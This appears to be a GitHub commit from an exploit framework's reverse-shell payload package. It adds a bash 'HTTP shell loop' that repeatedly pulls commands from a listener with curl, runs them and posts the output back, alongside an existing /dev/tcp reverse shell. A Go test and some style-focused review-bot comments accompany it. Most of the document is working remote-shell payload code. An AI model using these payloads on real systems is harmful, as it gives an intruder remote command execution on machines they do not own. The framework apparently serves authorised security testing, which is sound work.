
Commit 186cee9

authored
Merge pull request #378 from vulncheck-oss/payload/httpshellserver-shell
Add shell script loop payload for HTTPServeShell
2 parents a5d2ebf + 3114f0b commit 186cee9

2 files changed

+29
-0
lines changed


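--- a/payload/reverse/bash.go
+++ b/payload/reverse/bash.go
@@ -7,6 +7,7 @@ import (
 const (
 BashDefault = BashTCPRedirection
 BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
+BashHTTPShellLoop = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d || exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx ||exit;sleep 1;done'`
 )
 
 // The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
@@ -18,3 +19,15 @@ func (bash *BashPayload) Default(lhost string, lport int) string {
 func (bash *BashPayload) TCPRedirection(lhost string, lport int) string {
 return fmt.Sprintf(BashDefault, lhost, lport)
 }
+
+// An infinite loop shell script that will stay running until the HTTP server fails to respond.
+// This fits the c2.HTTPShellServer C2 logic in a shell script form.
+func (bash *BashPayload) HTTPShellLoop(lhost string, lport int, ssl bool, auth string) string {
+k := ``
+h := `http`
+if ssl {
+h = "https"
+k = `-k `
+}
+return fmt.Sprintf(BashHTTPShellLoop, k, auth, h, lhost, lport, k, auth, h, lhost, lport)
+}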
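Review bot: The new constant BashHTTPShellLoop in the first hunk has no doc comment, and its format takes ten positional arguments of which the same five are passed twice from HTTPShellLoop in the second hunk, so the two halves can silently drift if either side is edited. Using indexed verbs in the template (`%[1]s`, `%[2]s`, `%[3]s`, `%[4]s`, `%[5]d`, reused for the second occurrence) would let the Sprintf call pass each value once, `return fmt.Sprintf(BashHTTPShellLoop, k, auth, h, lhost, lport)`. A one-line comment above the constant naming the argument order, e.g. `// BashHTTPShellLoop is a fmt template taking (curl flags, auth token, scheme, host, port); see HTTPShellLoop.`, would make the template readable on its own. The locals `k` and `h` would also read better as `insecureFlag` and `scheme`, since their meaning only becomes clear at the `if ssl` branch.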

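--- a/payload/reverse/reverse_test.go
+++ b/payload/reverse/reverse_test.go
@@ -24,6 +24,22 @@ func TestBashDefault(t *testing.T) {
 t.Log(payload)
 }
 
+func TestBashHTTPShellLoop(t *testing.T) {
+payload := reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, true, "vulncheck")
+
+if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444 || exit)")" -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+t.Fatal(payload)
+}
+
+payload = reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, false, "vulncheck")
+
+if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H"VC-Auth: vulncheck" http://127.0.0.1:4444 || exit)")" -H"VC-Auth: vulncheck" http://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+t.Fatal(payload)
+}
+
+t.Log(payload)
+}
+
 func TestNetcatGaping(t *testing.T) {
 payload := reverse.Netcat.Default("127.0.0.1", 4444)
 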
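Review bot: The two `t.Fatal(payload)` calls in TestBashHTTPShellLoop print only the generated string, so a failure does not say whether the ssl=true or the ssl=false case broke, and the reader has to diff the output against the expected literal by eye. `t.Fatalf("ssl=true: got %q", payload)` and `t.Fatalf("ssl=false: got %q", payload)` would name the failing case directly. The trailing `t.Log(payload)` only records the second case; the first case is never logged, which is inconsistent with the equality check being applied to both, so either log both or drop the line.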